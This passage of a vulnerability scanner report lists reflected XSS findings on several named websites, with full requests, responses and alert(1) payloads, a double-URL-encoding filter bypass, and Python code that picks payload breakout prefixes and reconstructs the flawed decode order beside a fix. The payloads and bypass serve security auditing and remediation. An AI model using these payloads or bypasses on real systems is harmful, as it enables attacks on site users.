The value of REST URL parameter 3 is copied into the application's response. The payload 4cdfc--><script>alert(1)</script>6c7aea9cdab was submitted in the REST URL parameter 3 and was echoed unmodified. As in 4.180, the reflection visible in the excerpt below is the "url" entry of the <pre> request-parameter dump on the HTTP 500 error page, text between tags rather than an HTML comment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/images/loading.gif4cdfc--><script>alert(1)</script>6c7aea9cdab HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:28:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(63) "/images/loading.gif4cdfc--><script>alert(1)</script>6c7aea9cdab"
[3]=>
...[SNIP]...

4.182. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the application's response. The payload 89ae2--><script>alert(1)</script>0468e44a0a9 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified. The excerpt below shows it as an array key in the <pre> request-parameter dump on the HTTP 500 error page, so query-string names reach the page unencoded as well as values.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/images/loading.gif?89ae2--><script>alert(1)</script>0468e44a0a9=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:23:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
rl"]=>
string(19) "/images/loading.gif"
[3]=>
string(18) "images/loading.gif"
["controller"]=>
string(5) "index"
["action"]=>
string(5) "index"
["module"]=>
string(9) "pagefront"
["89ae2--><script>alert(1)</script>0468e44a0a9"]=>
...[SNIP]...

4.183. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The value of REST URL parameter 1 is copied into the application's response. The payload eef14--><img%20src%3da%20onerror%3dalert(1)>926bd771afb was submitted in the REST URL parameter 1 and was echoed, URL-decoded, as eef14--><img src=a onerror=alert(1)>926bd771afb. As in 4.179, the reflection shown in the excerpt is the "Invalid controller specified (...)" message on the HTTP 404 error page, visible text rather than an HTML comment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an onerror event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /imageseef14--><img%20src%3da%20onerror%3dalert(1)>926bd771afb/imageresizer.php?src=_var_data_gallery_photo_71_14_95_98_12_108.png&w=326&h=50&o=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (imageseef14--><img src=a onerror=alert(1)>926bd771afb)
        </p>
...[SNIP]...

4.184. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The value of REST URL parameter 2 is copied into the application's response. The payload 6af35--><img%20src%3da%20onerror%3dalert(1)>3e1a5ad96ed was submitted in the REST URL parameter 2 and was echoed, URL-decoded, as 6af35--><img src=a onerror=alert(1)>3e1a5ad96ed. In the excerpt below it appears as the "action" entry of the <pre> request-parameter dump on the HTTP 404 error page, text between tags rather than an HTML comment; the router has split the path into controller "images" and an action name containing the payload without encoding either.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an onerror event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/imageresizer.php6af35--><img%20src%3da%20onerror%3dalert(1)>3e1a5ad96ed?src=_var_data_gallery_photo_71_14_95_98_12_108.png&w=326&h=50&o=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:24:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(7) {
["controller"]=>
string(6) "images"
["action"]=>
string(63) "imageresizer.php6af35--><img src=a onerror=alert(1)>3e1a5ad96ed"
["module"]=>
...[SNIP]...

4.185. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 1 is copied into the application's response. The payload d418d--><img%20src%3da%20onerror%3dalert(1)>ffc954ffcee was submitted in the REST URL parameter 1 and was echoed, URL-decoded, as d418d--><img src=a onerror=alert(1)>ffc954ffcee. As in 4.179 and 4.183, the reflection shown in the excerpt is the "Invalid controller specified (...)" message on the HTTP 404 error page, visible text rather than an HTML comment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an onerror event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modulesd418d--><img%20src%3da%20onerror%3dalert(1)>ffc954ffcee/core/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:23:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (modulesd418d--><img src=a onerror=alert(1)>ffc954ffcee)
        </p>
...[SNIP]...

4.186. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 2 is copied into the application's response. The payload f13c6--><img%20src%3da%20onerror%3dalert(1)>68e93f27964 was submitted in the REST URL parameter 2 and was echoed, URL-decoded, as f13c6--><img src=a onerror=alert(1)>68e93f27964. In the excerpt below it appears as the "action" entry of the <pre> request-parameter dump on the HTTP 404 error page, text between tags rather than an HTML comment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an onerror event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/coref13c6--><img%20src%3da%20onerror%3dalert(1)>68e93f27964/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:24:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(51) "coref13c6--><img src=a onerror=alert(1)>68e93f27964"
["front"]=>
...[SNIP]...

4.187. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 3 is copied into the application's response. The payload 42cf2--><img%20src%3da%20onerror%3dalert(1)>4fde6733147 was submitted in the REST URL parameter 3 and was echoed, URL-decoded, as 42cf2--><img src=a onerror=alert(1)>4fde6733147. In the excerpt below the third path segment has become an array key in the <pre> request-parameter dump on the HTTP 404 error page, text between tags rather than an HTML comment.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an onerror event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/core/front42cf2--><img%20src%3da%20onerror%3dalert(1)>4fde6733147/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:26:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(4) "core"
["front42cf2--><img src=a onerror=alert(1)>4fde6733147"]=>
...[SNIP]...

4.188. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 4 is copied into the application's response. The payload aeff6--><img%20src%3da%20onerror%3dalert(1)>052b8df489a was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as aeff6--><img src=a onerror=alert(1)>052b8df489a. In the excerpt below it appears as the value of the "front" entry of the <pre> request-parameter dump on the HTTP 404 error page, text between tags rather than an HTML comment; the router pairs path segments as key/value, so alternate segments land as keys (4.187) and values (this issue).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an onerror event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/core/front/imagesaeff6--><img%20src%3da%20onerror%3dalert(1)>052b8df489a/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:27:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(4) "core"
["front"]=>
string(53) "imagesaeff6--><img src=a onerror=alert(1)>052b8df489a"
["module"]=>
...[SNIP]...
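
The context question raised for issues 4.179 to 4.188 (the scanner labels the reflection point an HTML comment while the excerpts show it in error-page text), as an added example that is not part of this report and not code from any of the scanned sites: a small Python checker that locates every reflection of a canary in a response body, classifies the surrounding HTML context, and names the prefix a payload needs in order to break out of it. The sample bodies are constructed to mirror the excerpts in this report (the error-page message, the <pre> parameter dump, a genuine comment, the quoted href attribute from issue 4.191, an inline script); the canary string and the markup around the excerpts are assumptions. The classifier is a heuristic over raw text, not an HTML parser, and is meant for confirming a scanner's context claim before choosing a payload.

```python
import re

CANARY = "zzq7canary"  # constructed marker; stands in for the scanner's random payload

# Constructed sample responses modelled on the excerpts in this report (assumed markup).
SAMPLES = {
    # exception message rendered between tags on the error page (4.179, 4.183, 4.185)
    "error_message": "<p><b>Message:</b> Invalid controller specified (en"
                     + CANARY + ")\n        </p>",
    # var_dump of request parameters inside <pre> (4.180, 4.181, 4.184, 4.186, 4.188)
    "param_dump": '<pre>array(6) {\n["url"]=>\nstring(63) "/images'
                  + CANARY + '/loading.gif"\n[3]=>\n</pre>',
    # parameter name or path segment used as an array key in the same dump (4.182, 4.187)
    "param_key": '<pre>["module"]=>\nstring(9) "pagefront"\n["' + CANARY + '"]=>\n</pre>',
    # a genuine HTML comment, the context the scanner's "-->" payloads are built for
    "comment": "<!-- request path: /en/" + CANARY + " -->",
    # value inside a double-quoted href attribute, as in issue 4.191
    "attribute": '<a href="http://www.google.com/search?hl=en&q=' + CANARY + '">',
    # value inside an inline script
    "script": '<script>var ref = "' + CANARY + '";</script>',
}

# What a payload must start with to escape each context (empty: nothing to close).
BREAKOUT_PREFIX = {
    "comment": "-->",
    "script": "</script>",
    "style": "</style>",
    "attribute(double-quoted)": '">',
    "attribute(single-quoted)": "'>",
    "tag": ">",
    "text": "",
}


def classify(body: str, idx: int) -> str:
    """Name the HTML context of body[idx] by looking at the markup before it."""
    before = body[:idx]
    low = before.lower()
    # an opened comment that has not been closed yet
    if before.rfind("<!--") > before.rfind("-->"):
        return "comment"
    # raw-text elements: their content is not parsed as markup
    for tag in ("script", "style"):
        if low.rfind("<" + tag) > low.rfind("</" + tag):
            return tag
    # inside an unfinished start tag: quoted attribute value or bare tag
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        tag_part = before[lt:]
        if tag_part.count('"') % 2:
            return "attribute(double-quoted)"
        if tag_part.count("'") % 2:
            return "attribute(single-quoted)"
        return "tag"
    return "text"


def find_reflections(body: str, canary: str):
    """Every (offset, context) at which canary appears in body."""
    return [(m.start(), classify(body, m.start()))
            for m in re.finditer(re.escape(canary), body)]


def contexts(body: str, canary: str):
    """Just the context names, in document order."""
    return [ctx for _, ctx in find_reflections(body, canary)]


def breakout_prefix(context: str) -> str:
    """Prefix a payload needs to leave the given context before its own markup."""
    return BREAKOUT_PREFIX[context]


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        for offset, ctx in find_reflections(body, CANARY):
            print(f"{name:14} offset {offset:3}  context={ctx:26} prefix={breakout_prefix(ctx)!r}")
```

Run against the samples, every ypg.com-shaped body classifies as "text", which is why a bare <script> or <img onerror> works there and the --> prefix is dead weight; only the constructed comment sample needs it, and the 4.191-shaped attribute sample needs "> instead.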

4.189. http://www.zoomerang.com/Survey/TinyMCE.ashx [font parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoomerang.com
Path:   /Survey/TinyMCE.ashx

Issue detail

The value of the font request parameter is copied into the application's response. The payload e0de6%253cscript%253ealert%25281%2529%253c%252fscript%253ea64883a00d5 was submitted in the font parameter and was echoed, after a second URL-decode, as e0de6<script>alert(1)</script>a64883a00d5. Note that the response is a generated stylesheet (Content-Type: text/css, fetched by the survey page with Accept: text/css) and the value lands inside a color: declaration, not in an HTML document as the scanner's template states.

Injected markup in a stylesheet executes only if a browser renders the response as HTML, for example when the URL is opened directly in a browser that sniffs content types; the response carries no X-Content-Type-Options: nosniff header. Independently of script execution, the parameter gives the requester full control over the contents of a stylesheet that survey pages load, which is a CSS injection in its own right.

The application attempts to block certain characters that are often used in XSS attacks, but this is circumvented by double URL-encoding them, for example by submitting %253c instead of <: the web server decodes %253c to %3c, the filter sees no < character, and the application then decodes the value a second time before writing it out.

Remediation detail

There is probably no need for the application to URL-decode the font value a second time, as the web server has already carried out one decode. In any case, input validation must run after all decoding and canonicalisation is complete, and for a value written into a stylesheet the check should be an allow-list for the CSS context (a font-family name, a size keyword, a hex colour) rather than a blocklist of HTML characters.

Request

GET /Survey/TinyMCE.ashx?module=StyleSheet&font=Arial+2+%23000001e0de6%253cscript%253ealert%25281%2529%253c%252fscript%253ea64883a00d5 HTTP/1.1
Host: www.zoomerang.com
Proxy-Connection: keep-alive
Referer: http://www.zoomerang.com/Survey/WEB22BZL8ZUMFQ/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerWDC-PROD-ZM-WWW-SURVEY_80-8086=1057781770.38431.0000

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 01:05:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: public
Expires: Mon, 18 Apr 2011 01:05:32 GMT
Content-Type: text/css; charset=UTF-8
Content-Length: 150

.mceContentBody, .DefaultFont, #DefaultFont {
font-family: Arial;
color: #000001e0de6<script>alert(1)</script>a64883a00d5;
font-size: small;
}
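
The decode-order problem described for this issue, as an added example that is not part of the report and not code from the zoomerang.com application: a Python reconstruction of how a validate-then-decode-again pipeline lets the double-encoded font value through, beside an order that treats the server's single decode as canonical and allow-lists the value for the CSS context it is written into. The request value is taken from the report's request line; the split of the value into family, size index and colour, the size table and the blocklist are assumptions made to reproduce the visible output (Arial, small, #000001...).

```python
import re
from urllib.parse import unquote_plus

# Request value taken verbatim from the report's request line for this issue.
REPORT_FONT_VALUE = ("Arial+2+%23000001e0de6%253cscript%253ealert%25281%2529"
                     "%253c%252fscript%253ea64883a00d5")

# Assumed: the kind of character blocklist the report's note implies the app uses.
BLOCKED_CHARS = re.compile(r'[<>"\']')
# Assumed: numeric size index mapped to a CSS keyword ("2" -> small, as in the response).
SIZES = {"1": "x-small", "2": "small", "3": "medium", "4": "large"}
# Allow-lists for the two free-text fields that are written into the stylesheet.
FONT_FAMILY_OK = re.compile(r"^[A-Za-z][A-Za-z0-9 ,\-]{0,39}$")
HEX_COLOUR_OK = re.compile(r"^#[0-9A-Fa-f]{6}$")


def server_decode(raw_query_value: str) -> str:
    """One URL-decode: the step the web server performs before the app sees the value."""
    return unquote_plus(raw_query_value)


def render_css(family: str, size: str, colour: str) -> str:
    """Emit the stylesheet in the shape seen in the report's response."""
    return (".mceContentBody, .DefaultFont, #DefaultFont {\n"
            f"font-family: {family};\ncolor: {colour};\n"
            f"font-size: {SIZES.get(size, 'small')};\n}}")


def render_vulnerable(font_value: str) -> str:
    """Reconstruction of the flawed order: validate first, then URL-decode a second time.

    The blocklist runs on the once-decoded value, where a double-encoded payload still
    reads '%3cscript%3e'; the extra unquote afterwards turns it into '<script>'.
    """
    if BLOCKED_CHARS.search(font_value):
        raise ValueError("font value rejected")
    family, size, colour = unquote_plus(font_value).split(" ", 2)  # second decode
    return render_css(family, size, colour)


def render_fixed(font_value: str) -> str:
    """Corrected order: the server-decoded value is canonical; allow-list each field.

    No second decode, and validation is positive (what a font name, a size index and a
    hex colour may look like) instead of a blocklist of HTML characters.
    """
    parts = font_value.split(" ", 2)
    if len(parts) != 3:
        raise ValueError("font value rejected")
    family, size, colour = parts
    if not (FONT_FAMILY_OK.match(family) and size in SIZES and HEX_COLOUR_OK.match(colour)):
        raise ValueError("font value rejected")
    return render_css(family, size, colour)


def is_rejected(render, font_value: str) -> bool:
    """True if the given renderer refuses the value."""
    try:
        render(font_value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    once = server_decode(REPORT_FONT_VALUE)
    print("after the server's decode:", once)
    print("vulnerable order emits:\n" + render_vulnerable(once))
    print("fixed order rejects it:", is_rejected(render_fixed, once))
```

The single-encoded form of the same payload is caught by the vulnerable blocklist, which is why a scanner has to try the double-encoded variant; the fixed renderer rejects both because the colour field is no longer six hex digits, not because it recognised a script tag.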

4.190. http://mochibot.com/my/core.swf [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the Referer HTTP header is copied into the application's response. The payload 41fa5<script>alert(1)</script>2c341abede3 was submitted in the Referer HTTP header and was echoed unmodified. The response, however, is not an HTML document: it is a dynamically generated SWF (Content-Type: application/x-shockwave-flash) in which the Referer is embedded as the value of a REF variable alongside the other query-string values.

A <script> element inside SWF data is inert on its own, so whether this reflection is exploitable depends on what the Flash code does with REF (for example passing it to a URL-loading call), which the report does not show. The finding does establish that arbitrary header content is embedded unsanitised in the served file.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user: the victim's browser must be induced to send the crafted Referer, and browsers that follow the WHATWG URL standard percent-encode characters such as ", < and > in the URLs they send, so delivery of the raw characters via a link depends on the victim's browser. In the past, client-side technologies such as Flash could be used to make another user's browser send a request with an arbitrary HTTP header; where such a technique is available it can be leveraged to exploit the flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=41fa5<script>alert(1)</script>2c341abede3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:08:14 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1696
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.50:8890
X-Mochi-Source: 10.0.0.238:6754

FWS.....p...........D.....C....?.w.......*..........System...
..security.N...allowDomain.R.....this........W....REF..http://www.google.com/search?hl=en&q=41fa5<script>alert(1)</script>2c341abede3.O......sb..remote.O......f.._level0.O.    ....MV..8.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R.
